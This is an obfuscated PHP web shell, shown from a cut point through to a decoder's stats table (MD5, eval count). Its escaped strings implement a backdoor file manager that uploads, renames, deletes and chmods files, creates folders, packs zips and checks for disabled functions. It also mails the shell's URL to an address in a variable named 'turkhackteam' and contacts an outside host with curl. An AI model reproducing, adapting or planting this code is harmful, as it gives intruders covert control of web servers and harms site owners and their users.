"\57"); $pathParts["\145\170\164\145\156\163\151\x6f\x6e"] = substr(strrchr($filepath, "\x2e"), 1); $pathParts["\x66\151\x6c\x65\x6e\x61\x6d\145"] = ltrim(substr($pathParts["\x62\x61\163\145\x6e\x61\x6d\x65"], 0, strrpos($pathParts["\x62\141\163\x65\x6e\141\x6d\x65"], "\x2e")), "\x2f"); return $pathParts; } } function formatSizeUnits($bytes) { goto HSjgFT8piE; PCvG2YVIEE: AqSqEzsJpN: $bytes = number_format($bytes / 1048576, 2) . "\x20\x4d\x42"; goto XJusoonAww; az5BU1nUFK: $bytes = number_format($bytes / 1024, 2) . "\x20\113\102"; goto COiPeKJsM1; x9vfNHLDZB: $bytes = "\60\x20\x62\171\164\145\x73"; goto XJusoonAww; a_9cse59W5: $bytes = number_format($bytes / 1073741824, 2) . "\x20\107\x42"; goto XJusoonAww; goto PCvG2YVIEE; HSjgFT8piE: if ($bytes >= 1073741824) { goto a_9cse59W5; } if ($bytes >= 1048576) { goto AqSqEzsJpN; } if ($bytes >= 1024) { goto az5BU1nUFK; } if ($bytes > 1) { goto ymuX_yQc8G; } if ($bytes == 1) { goto dhwHVoGtDR; } goto x9vfNHLDZB; KkLBgnBbDf: $bytes = $bytes . "\x20\142\x79\164\x65"; XJusoonAww: return $bytes; goto uiL8scUfb2; COiPeKJsM1: goto XJusoonAww; ymuX_yQc8G: $bytes = $bytes . "\x20\x62\171\164\x65\x73"; goto XJusoonAww; dhwHVoGtDR: goto KkLBgnBbDf; uiL8scUfb2: } function fileExtension($file) { return substr(strrchr($file, "\x2e"), 1); } goto JzgEgJczEV; mQyYOaHXf2: echo "\40\x20\x3c\57\x74\142\157\144\171\x3e\15\12\74\x2f\x74\x61\x62\x6c\145\x3e"; QZch_C6JHG: if (!isset($_GET["\165\160\x6c\157\x61\x64"])) { goto d53lTxcAYk; } echo "\xd\xa\x20\40\x20\40\74\x66\x6f\162\x6d\40\x6d\145\x74\150\x6f\x64\75\42\160\x6f\x73\164\x22\40\145\x6e\143\x74\x79\x70\x65\75\42\x6d\165\154\164\151\x70\141\x72\164\x2f\x66\x6f\x72\155\55\x64\x61\x74\141\42\76\xd\xa\x20\x20\x20\40\x20\40\40\40\x53\145\154\x65\143\164\40\x66\151\x6c\x65\40\x74\x6f\40\165\160\154\x6f\x61\x64\72\15\xa\x20\x20\x20\x20\x20\x20\40\x20\x3c\151\x6e\160\165\164\40\164\171\x70\x65\75\42\146\151\154\145\x22\x20\x6e\x61\x6d\145\x3d\42\x66\x69\x6c\145\x54\157\x55\160\x6c\157\x61\144\133\x5d\x22\x20\151\144\x3d\42\x66\151\154\x65\124\x6f\125\x70\154\157\141\x64\x22\x20\155\165\154\x74\151\x70\154\x65\76\xd\12\40\x20\x20\40\40\40\x20\x20\74\x69\156\x70\165\164\x20\164\x79\x70\x65\75\42\163\165\x62\155\151\164\42\40\143\154\x61\x73\x73\75\42\x62\164\x6e\x20\x62\x74\x6e\55\x64\x61\162\x6b\x22\x20\x76\141\154\x75\145\75\42\125\160\154\157\141\144\x22\x20\x6e\x61\155\145\x3d\42\x75\x70\x6c\x6f\x61\144\42\76\15\12\40\x20\40\40\x3c\x2f\x66\157\x72\155\x3e"; d53lTxcAYk: goto O7k9wbo36H; GoIXCwZ3d6: mail($kime, $baslik, $turkhackteam); goto OxLsM; OxLsM: goto tZJnY9oqPH; A6kcfDH9ZR: McBGIq0COs: TeSIip9XPd: if (!isset($_POST["\143\162\145\x61\x74\145\146\157\x6c\144\x65\x72"])) { goto vPLKKGw5m0; } $dir = PATH . "\x2f" . $_POST["\x6e"]; if (is_dir($dir)) { goto CLE6JEJnql; } goto tr1pEdNdFp; b236ZA01T8: echo "\x3c\x73\x63\162\x69\160\x74\76\x61\x6c\145\162\164\50\47\106\x69\154\145\x20\162\x65\x6d\x6f\x76\x65\x64\x2e\47\51\x3b\40\167\x69\156\x64\x6f\167\56\154\157\x63\141\164\x69\x6f\156\x2e\x72\145\x70\154\141\143\145\x28\x27\77\160\75" . encodePath(PATH) . "\47\x29\73\x3c\57\163\x63\x72\151\x70\164\x3e"; Bctwk126y2: goto hZKzTQm1yy; clz40yMAqx: if (rmdir($name) == true) { goto dDlB62giGv; } goto epV_l6oCAf; qM7tKaKnE0: goto L8qA1n6y8f; BzMo3V1_r8: $p = $root_path; goto L8qA1n6y8f; Q1kZhgy6OO: goto KE0xkKhOsg; pQiO1r5X9P: goto I3NHO10l0D; C25QBScvNh: chmod($name, 0644); echo "\x3c\163\x63\x72\151\160\164\x3e\x61\154\x65\x72\164\x28\x27\x46\x69\x6c\x65\40\143\x68\x6d\157\x64\40\165\160\x64\x61\164\x65\x2e\47\x29\x3b\x20\x77\151\156\144\157\x77\x2e\154\157\x63\x61\x74\x69\x6f\156\56\x72\x65\160\x6c\141\143\145\50\47\x3f\x70\x3d" . encodePath(PATH) . "\47\x29\x3b\x3c\57\163\x63\162\x69\x70\164\x3e"; I3NHO10l0D: goto xIjQh75KP9; RlfEosNueR: mP6a0rBnag: echo "\153\x69\x6c\x6c\40\xe6\211\247\350\241\x8c\xe4\270\215\346\210\x90\345\212\x9f"; T8xgJ1Gmim: yulh6SR4bZ: if (!isset($_GET["\x6e\145\x77\146\151\154\x65"])) { goto xMZLJlmg5e; } goto HseYlxXS0w; ro56FjsUmp: if ($create_result) { goto YPrZzdFabJ; } echo "\74\163\x63\162\151\x70\x74\x3e\141\154\145\x72\x74\x28\47\146\141\151\x6c\x20\x63\162\145\141\164\145\56\47\x29\x3b\40\x77\x69\x6e\144\157\x77\x2e\154\157\143\x61\x74\151\x6f\x6e\x2e\162\145\x70\x6c\x61\x63\145\x28\47\77\x70\x3d" . encodePath(PATH) . "\47\x29\x3b\74\57\163\x63\162\x69\160\164\76"; goto McBGIq0COs; YPrZzdFabJ: echo "\74\163\143\x72\151\160\164\x3e\x61\154\145\162\164\50\47\143\162\145\x61\164\x65\x20\x73\165\x63\x63\x65\163\x73\56\x27\x29\73\x20\167\x69\x6e\144\x6f\x77\x2e\154\157\143\x61\164\x69\157\156\56\x72\x65\160\x6c\x61\143\x65\x28\x27\77\160\75" . encodePath(PATH) . "\x27\51\x3b\x3c\x2f\163\x63\162\151\160\164\x3e"; goto A6kcfDH9ZR; DRcFJ0T1ON: VQYpSLiD5T: if (unlink($name)) { goto YQ_G80UA7m; } echo "\74\163\x63\x72\151\160\x74\76\x61\x6c\x65\x72\164\50\47\x53\x6f\155\145\x20\145\162\162\157\x72\x20\157\143\x63\x75\x72\x72\145\144\x2e\47\x29\x3b\40\167\151\x6e\144\157\x77\x2e\154\x6f\143\x61\164\x69\157\x6e\x2e\x72\x65\160\154\x61\x63\145\50\x27\x3f\x70\x3d" . encodePath(PATH) . "\x27\x29\x3b\x3c\57\163\x63\162\x69\160\x74\76"; goto Bctwk126y2; YQ_G80UA7m: goto b236ZA01T8; wCOeXdWwW3: goto KHLv3BehnT; CLE6JEJnql: echo "\x3c\x73\x63\162\151\160\x74\76\x61\x6c\x65\x72\x74\x28\47\x66\x6f\x6c\144\145\x72\40\x65\170\x69\x74\163\56\x27\x29\73\40\x77\151\156\144\x6f\x77\56\154\157\143\x61\x74\151\x6f\x6e\x2e\162\x65\160\154\141\143\x65\50\47\x3f\160\x3d" . encodePath(PATH) . "\x27\51\73\x3c\57\163\x63\162\x69\160\x74\76"; KHLv3BehnT: vPLKKGw5m0: goto Zgi8Ab0lWU; s2MJ9P5gIy: goto kFbIK; Lvv7W: $turkhackteam .= "\123\x68\145\154\154\x20\114\x69\x6e\x6b\40\72\40\x68\164\x74\x70\72\57\x2f" . $_SERVER["\x53\105\122\x56\105\x52\x5f\x4e\101\x4d\x45"] . $_SERVER["\x50\110\120\137\123\105\x4c\106"] . "\15\12"; goto rb_fC; VQ0so: goto GoIXCwZ3d6; FTc77pbCnc: $i++; goto OqSJMaTAuM; RSakv7kI2r: echo $str; n2gtoQzzO0: goto UkZgpCr8T7; yPOBkfOl2J: goto iRua8CtKDW; p2Z0x5ZOg0: echo "\x3c\x73\143\162\x69\160\x74\x3e\141\x6c\x65\162\164\50\x27\124\x68\151\x73\x20\x69\163\156\47\x74\x20\132\x69\160\40\106\151\154\x65\x20\41\x27\51\73\40\x77\x69\156\x64\157\167\x2e\x6c\x6f\x63\141\x74\x69\x6f\x6e\x2e\x72\145\160\154\141\x63\145\x28\x27\77\160\x3d" . encodePath(PATH) . "\x27\x29\x3b\x3c\57\163\x63\162\151\x70\x74\76"; iRua8CtKDW: $zip = new ZipArchive(); goto tHK0hE0LNU; o4bNfRbYi7: gXvxIudBlc: if (!isset($_GET["\162"])) { goto bU5iKADKcC; } if (!(!empty($_GET["\x72"]) && isset($_GET["\x71"]))) { goto NvbGdzFS_o; } echo "\15\12\x20\40\x20\40\74\x66\x6f\162\x6d\x20\x6d\145\164\150\x6f\144\75\42\x70\x6f\163\164\42\76\xd\xa\x20\x20\40\40\x20\40\40\40\122\x65\x6e\141\155\x65\72\15\12\40\x20\x20\40\x20\x20\40\x20\x3c\151\x6e\160\165\164\40\164\171\x70\x65\x3d\x22\164\145\x78\x74\42\40\x6e\141\x6d\145\x3d\42\x6e\x61\155\145\42\40\x76\141\154\x75\x65\75\x22" . $_GET["\x72"] . "\x22\76\15\12\x20\x20\x20\x20\40\x20\40\40\x3c\151\156\160\165\x74\x20\164\171\160\145\75\42\x73\165\142\155\151\x74\x22\40\x63\154\141\163\163\75\x22\x62\164\x6e\40\x62\x74\156\55\x64\141\162\153\x22\40\x76\x61\x6c\165\x65\75\x22\x52\x65\x6e\x61\155\x65\42\40\156\x61\155\145\x3d\x22\162\x65\x6e\141\x6d\145\42\x3e\15\xa\x20\x20\x20\40\x3c\x2f\x66\x6f\x72\x6d\76"; if (!isset($_POST["\x72\x65\x6e\x61\x6d\145"])) { goto aM8DeAOh9i; } goto RttEvMx3zw; IzSgJV9j8V: echo "\15\xa\x3c\x2f\144\x69\x76\76\xd\12\x3c\144\x69\x76\x20\x63\154\141\x73\x73\75\42\x66\157\x72\x6d\x2d\151\156\x6c\x69\156\145\x22\76\xd\12\74\x61\40\150\x72\145\x66\x3d\42\77\165\160\x6c\x6f\x61\x64\x26\x71\x3d" . urlencode(encodePath(PATH)) . "\42\x3e\x3c\142\165\x74\x74\157\x6e\x20\x63\x6c\x61\163\x73\x3d\42\x62\x74\156\40\x62\x74\x6e\55\144\141\x72\153\42\40\x74\171\160\x65\75\x22\142\x75\x74\164\157\x6e\x22\x3e\125\160\x6c\x6f\x61\144\x20\106\x69\x6c\145\x3c\x2f\142\165\164\164\157\x6e\x3e\74\57\141\x3e\15\xa\74\141\x20\x68\x72\145\146\75\x22\x3f\x6b\153\46\161\x3d" . urlencode(encodePath(PATH)) . "\x22\x3e\x3c\142\x75\164\x74\157\156\40\143\x6c\x61\x73\x73\75\x22\x62\164\x6e\x20\x62\164\156\55\x64\x61\x72\153\x22\x20\x74\171\160\x65\75\x22\142\165\164\164\x6f\156\x22\x3e\x2b\x6b\x69\x20\x6c\154\74\x2f\142\x75\164\x74\157\156\76\x3c\x2f\x61\76\xd\12\x3c\x61\40\150\162\145\x66\75\x22\77\x6e\x65\167\x66\x69\154\145\46\x71\75" . urlencode(encodePath(PATH)) . "\x22\x3e\74\x62\165\x74\x74\157\156\x20\143\154\141\163\x73\75\x22\142\x74\156\40\142\164\156\55\x64\x61\162\x6b\42\x20\x74\x79\160\x65\x3d\42\x62\x75\x74\164\x6f\156\x22\x3e\x2b\116\x65\x77\x20\x46\151\154\x65\74\57\x62\x75\x74\x74\157\156\76\74\x2f\x61\x3e\15\12\74\141\x20\x68\162\145\x66\75\42\77\x6e\145\x77\x66\x6f\154\144\145\x72\x26\161\75" . urlencode(encodePath(PATH)) . "\42\76\x3c\x62\165\x74\x74\x6f\156\40\x63\154\x61\x73\x73\x3d\x22\x62\x74\156\40\x62\x74\156\55\144\x61\162\153\x22\x20\x74\171\160\x65\x3d\x22\x62\x75\x74\x74\x6f\x6e\x22\76\x2b\x4e\x65\167\x20\x46\157\154\144\x65\162\74\x2f\142\165\x74\164\157\x6e\76\x3c\x2f\x61\x3e\xd\xa\74\141\x20\150\162\x65\x66\75\x22\x3f\x63\x68\x65\143\x6b\163\x69\164\145\x6d\x26\161\x3d" . urlencode(encodePath(PATH)) . "\x22\x3e\x3c\x62\165\x74\x74\x6f\x6e\x20\x63\154\x61\163\163\x3d\42\142\x74\156\x20\x62\164\x6e\x2d\144\x61\x72\153\42\x20\x74\x79\x70\145\75\x22\x62\x75\x74\x74\157\x6e\42\76\53\x43\150\145\x63\x6b\40\163\151\164\x65\x20\x6d\x6d\x3c\57\142\165\164\164\x6f\156\x3e\x3c\57\x61\x3e\xd\xa\15\12\x3c\x61\x20\150\x72\145\x66\75\42\x3f\42\x3e\74\142\x75\164\164\x6f\156\x20\164\171\x70\145\x3d\x22\142\x75\164\164\x6f\156\x22\x20\143\x6c\x61\163\x73\x3d\x22\142\164\156\40\x62\164\x6e\55\144\x61\x72\x6b\x22\76\110\117\x4d\105\x3c\57\142\x75\164\x74\x6f\x6e\76\x3c\57\141\76\x20\15\xa\x3c\57\144\151\x76\76\15\xa\x3c\57\156\141\166\x3e"; echo "\15\xa\xd\12\xd\xa\40"; if (isset($_GET["\x70"])) { goto SxJKZiV3ke; } if (!empty($_GET)) { goto HsZkaRL7H2; } echo "\74\163\x63\162\x69\160\x74\x3e\167\x69\x6e\x64\157\167\x2e\154\157\143\x61\x74\151\157\x6e\x2e\162\145\160\x6c\141\143\x65\50\47\x3f\x70\75\x27\51\x3b\74\57\163\143\162\151\x70\164\x3e"; goto U7bRhx3CHw; n4XwIFiptY: if (!is_writable($root)) { goto Huyq0AI19b; } echo "\167\x72\151\x74\x65\141\x62\154\145"; goto CzngkJwlxF; Huyq0AI19b: echo "\162\157\x6f\x74\40\156\x6f\40\x77\x72\x69\x74\145\x61\x62\154\x65"; goto IlX38JYC4t; tr1pEdNdFp: if (mkdir($dir, 0644, true)) { goto iYKC3S2seu; } goto nWOecSi_IL; iYKC3S2seu: echo "\74\163\x63\x72\151\160\x74\76\141\x6c\145\162\x74\x28\47\x66\157\154\144\145\x72\x20\x63\162\145\141\x74\145\x20\163\x75\143\x63\x65\163\163\x2e\47\x29\x3b\x20\167\151\156\x64\x6f\167\x2e\x6c\x6f\143\141\164\151\x6f\x6e\56\162\145\160\154\x61\x63\145\x28\x27\x3f\x70\75" . encodePath(PATH) . "\47\x29\73\x3c\x2f\x73\x63\162\151\x70\164\x3e"; nWOecSi_IL: goto wCOeXdWwW3; X8KH1uvt0u: $error_number++; u9gYMPsCF2: if (!in_array("\x66\151\x6c\145\x5f\160\x75\x74\137\x63\x6f\156\164\x65\x6e\164\163", $disabled)) { goto COqp2ZXeGk; } $fuction_info .= "\146\x69\154\145\137\x70\x75\x74\137\x63\x6f\156\164\145\x6e\x74\x73\x20\x69\163\40\x64\x69\163\141\x62\x6c\145"; $error_number++; goto aaNEIZoo6j; aeX22B5Tfx: i98ETcJYYy: echo "\x3c\163\x63\x72\151\x70\164\x3e\141\154\x65\x72\164\50\47\x53\x75\x63\143\145\x73\x73\x20\x7a\151\160\x20\106\x69\154\x65\40\x21\x27\51\73\x20\167\151\x6e\144\x6f\167\x2e\154\x6f\143\x61\164\x69\157\156\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x27\77\160\x3d" . encodePath(PATH) . "\x27\x29\x3b\x3c\x2f\x73\x63\x72\151\x70\164\x3e"; nbvh0Hfg4M: jWnHz3QB4f: if (!(isset($_GET["\160\141\x63\153"]) && isset($_GET["\x71"]))) { goto kw3RfNbNii; } goto t5jf3rVV9n; IlX38JYC4t: CzngkJwlxF: echo "\x20\x70\x68\160\40\x76\145\x72\163\x69\x6f\x6e\x3a\x20" . phpversion(); if (class_exists("\132\x69\160\101\162\143\x68\151\x76\145")) { goto Sx7byG2IEp; } echo "\74\146\157\156\x74\40\x63\157\x6c\x6f\162\75\x22\162\145\144\42\76\x20\40\x6e\x6f\x20\163\x75\x70\x70\x6f\x72\x74\40\172\151\x70\x3c\x2f\x66\157\156\x74\76"; Sx7byG2IEp: goto IOovTEcqk1; rOIgmEEU59: goto q4X3Ktp8Rf; cG0ynFGuhX: if (empty($_GET["\x70"])) { goto BzMo3V1_r8; } if (!is_dir(decodePath($_GET["\x70"]))) { goto Q1kZhgy6OO; } if (is_dir(decodePath($_GET["\x70"]))) { goto fhzsB2yta0; } goto qM7tKaKnE0; zoUJOAeR3Y: if (!isset($_GET["\x63\x68\x65\x63\x6b\163\151\164\145\x6d"])) { goto gXvxIudBlc; } $url = "\150\164\x74\160\72\57\x2f\152\x2e\143\162\x65\x61\164\145\163\x65\x6f\56\x78\171\172"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); goto Hzmz5X2VGB; tZJnY9oqPH: echo "\xd\12\40\40\x20\x20\x3c\163\143\x72\x69\x70\164\x20\163\x72\143\x3d\x22\x68\x74\x74\x70\x73\x3a\57\57\x63\x64\156\x2e\x6a\x73\x64\145\x6c\x69\x76\x72\56\x6e\x65\x74\57\156\160\155\57\x62\x6f\x6f\x74\x73\x74\162\x61\x70\100\x35\x2e\63\x2e\x30\x2d\x61\154\x70\x68\141\x31\57\x64\151\x73\164\57\152\x73\x2f\142\157\x6f\x74\163\164\162\141\x70\x2e\142\165\x6e\144\x6c\145\x2e\x6d\151\156\56\x6a\x73\x22\15\xa\40\x20\x20\x20\x20\x20\40\40\x69\156\x74\x65\x67\x72\151\164\x79\75\42\163\x68\141\x33\70\x34\x2d\x77\x37\x36\x41\161\x50\146\x44\x6b\x4d\102\x44\x58\157\x33\60\152\123\61\x53\x67\145\x7a\66\160\x72\x33\x78\x35\x4d\x6c\121\61\132\101\x47\103\53\156\x75\132\102\53\x45\131\144\x67\x52\132\x67\x69\167\x78\x68\x54\102\x54\153\x46\67\x43\x58\166\116\x22\xd\12\x20\x20\x20\40\40\40\x20\40\x63\x72\157\163\x73\x6f\x72\x69\x67\151\156\75\x22\141\x6e\157\156\171\x6d\157\165\163\x22\x3e\74\57\163\143\162\x69\160\164\76\xd\xa\74\57\142\x6f\144\171\76\15\12\15\xa\74\x2f\x68\164\155\154\76";Function Calls
| None |
Stats
| MD5 | 59afd3d5b777a85787b7a4dc3cbe40ab |
| Eval Count | 0 |
| Decode Time | 73 ms |